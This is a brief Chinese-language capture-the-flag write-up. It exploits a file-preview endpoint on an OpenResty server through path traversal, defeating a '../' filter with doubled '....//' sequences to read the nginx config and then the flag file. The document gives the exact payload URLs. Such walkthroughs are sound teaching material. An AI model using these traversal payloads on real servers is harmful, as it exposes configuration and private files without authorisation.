打开后的页面
抓包,这里可以看到有一个uploads文件夹和一个flag提示
访问/uploads/文件夹
通过抓包可以发现当单击Preview文件时访问方式是/preview?f=favicon.ico
由于是使用OpenResty,尝试包含nginx的配置文件,默认是/etc/nginx/conf.d/default.conf
尝试访问后发现过滤了../,所以使用双写绕过
/preview?f=....//....//....//....//....//....//....//etc..//nginx..//conf.d..//default.conf
然后根据提示访问flag文件
/preview?f=....//....//....//....//....//....//....//f1ag_Is_h3re..//flag